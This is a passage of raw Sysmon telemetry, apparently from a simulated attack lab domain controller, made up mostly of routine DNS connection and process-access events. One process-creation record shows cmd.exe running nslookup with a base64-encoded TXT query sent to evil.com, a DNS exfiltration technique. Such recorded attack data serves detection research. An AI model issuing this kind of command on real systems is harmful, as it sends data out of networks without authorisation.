process>-udpfalsefalse127.0.0.1-51395-false127.0.0.1-53domain 354300x8000000000000000216551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.579{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51395- 354300x8000000000000000216550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.579{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51395- 354300x8000000000000000216549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.579{00000000-0000-0000-0000-000000000000}7036<unknown process>-udptruefalse127.0.0.1-51395-false127.0.0.1-53domain 354300x8000000000000000216548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.569{00000000-0000-0000-0000-000000000000}7036<unknown process>-udpfalsefalse127.0.0.1-51394-false127.0.0.1-53domain 354300x8000000000000000216547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.569{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51394- 354300x8000000000000000216546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.569{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51394- 354300x8000000000000000216545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.569{00000000-0000-0000-0000-000000000000}7036<unknown process>-udptruefalse127.0.0.1-51394-false127.0.0.1-53domain 354300x8000000000000000216544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.568{00000000-0000-0000-0000-000000000000}7036<unknown process>-udpfalsefalse127.0.0.1-51393-false127.0.0.1-53domain 354300x8000000000000000216543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.568{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51393- 354300x8000000000000000216542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.568{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51393- 354300x8000000000000000216541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.568{00000000-0000-0000-0000-000000000000}7036<unknown process>-udptruefalse127.0.0.1-51393-false127.0.0.1-53domain 354300x8000000000000000216540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.443{00000000-0000-0000-0000-000000000000}5596<unknown process>-udpfalsefalse127.0.0.1-51392-false127.0.0.1-53domain 354300x8000000000000000216539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.443{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51392- 354300x8000000000000000216538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.443{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51392- 10341000x8000000000000000216537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.255{2E1864BB-1902-629A-B246-000000005F02}32123336C:\Windows\system32\conhost.exe{2E1864BB-1902-629A-B346-000000005F02}7952C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.255{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000216535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.443{00000000-0000-0000-0000-000000000000}5596<unknown process>-udptruefalse127.0.0.1-51392-false127.0.0.1-53domain 10341000x8000000000000000216534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.255{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.255{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.255{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.255{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-B346-000000005F02}7952C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.255{2E1864BB-1902-629A-B146-000000005F02}36162172C:\Windows\system32\cmd.exe{2E1864BB-1902-629A-B346-000000005F02}7952C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.259{2E1864BB-1902-629A-B346-000000005F02}7952C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1902-629A-B146-000000005F02}3616C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzjfu.tmp 2>&1 354300x8000000000000000216528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.443{00000000-0000-0000-0000-000000000000}5596<unknown process>-udpfalsefalse127.0.0.1-51391-false127.0.0.1-53domain 354300x8000000000000000216527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.443{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51391- 354300x8000000000000000216526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.443{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51391- 354300x8000000000000000216525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.443{00000000-0000-0000-0000-000000000000}5596<unknown process>-udptruefalse127.0.0.1-51391-false127.0.0.1-53domain 354300x8000000000000000216524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.442{00000000-0000-0000-0000-000000000000}5596<unknown process>-udpfalsefalse127.0.0.1-51390-false127.0.0.1-53domain 354300x8000000000000000216523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.442{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51390- 354300x8000000000000000216522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.442{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51390- 354300x8000000000000000216521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.442{00000000-0000-0000-0000-000000000000}5596<unknown process>-udptruefalse127.0.0.1-51390-false127.0.0.1-53domain 354300x8000000000000000216520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.360{00000000-0000-0000-0000-000000000000}6688<unknown process>-udpfalsefalse127.0.0.1-51389-false127.0.0.1-53domain 354300x8000000000000000216519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.360{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51389- 354300x8000000000000000216518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.360{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51389- 354300x8000000000000000216517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.360{00000000-0000-0000-0000-000000000000}6688<unknown process>-udptruefalse127.0.0.1-51389-false127.0.0.1-53domain 354300x8000000000000000216516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.360{00000000-0000-0000-0000-000000000000}6688<unknown process>-udpfalsefalse127.0.0.1-51388-false127.0.0.1-53domain 354300x8000000000000000216515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.360{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51388- 354300x8000000000000000216514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.360{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51388- 354300x8000000000000000216513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.359{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51387- 354300x8000000000000000216512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.359{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51387- 354300x8000000000000000216511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.359{00000000-0000-0000-0000-000000000000}6688<unknown process>-udptruefalse127.0.0.1-51387-false127.0.0.1-53domain 354300x8000000000000000216510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.256{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51386- 354300x8000000000000000216509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.256{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51386- 354300x8000000000000000216508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.256{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51385- 354300x8000000000000000216507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.256{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51385- 354300x8000000000000000216506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.255{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51384- 354300x8000000000000000216505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.255{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51384- 354300x8000000000000000216504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.082{00000000-0000-0000-0000-000000000000}5440<unknown process>-udpfalsefalse127.0.0.1-51383-false127.0.0.1-53domain 354300x8000000000000000216503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.082{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51383- 354300x8000000000000000216502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.884{00000000-0000-0000-0000-000000000000}1736<unknown process>-udptruefalse127.0.0.1-51380-false127.0.0.1-53domain 354300x8000000000000000216501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.884{00000000-0000-0000-0000-000000000000}1736<unknown process>-udptruefalse127.0.0.1-51379-false127.0.0.1-53domain 354300x8000000000000000216500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.883{00000000-0000-0000-0000-000000000000}1736<unknown process>-udptruefalse127.0.0.1-51378-false127.0.0.1-53domain 10341000x8000000000000000216499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.239{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1902-629A-B246-000000005F02}3212C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.239{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1902-629A-B246-000000005F02}3212C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000216497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.732{00000000-0000-0000-0000-000000000000}7152<unknown process>-udpfalsefalse127.0.0.1-51377-false127.0.0.1-53domain 354300x8000000000000000216496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.732{00000000-0000-0000-0000-000000000000}7152<unknown process>-udptruefalse127.0.0.1-51377-false127.0.0.1-53domain 10341000x8000000000000000216495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.223{2E1864BB-1902-629A-B246-000000005F02}32123336C:\Windows\system32\conhost.exe{2E1864BB-1902-629A-B146-000000005F02}3616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.208{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-B246-000000005F02}3212C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.208{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-B146-000000005F02}3616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.208{2E1864BB-18E0-629A-6742-000000005F02}39766076C:\Windows\System32\WScript.exe{2E1864BB-1902-629A-B146-000000005F02}3616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.208{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.208{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.208{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 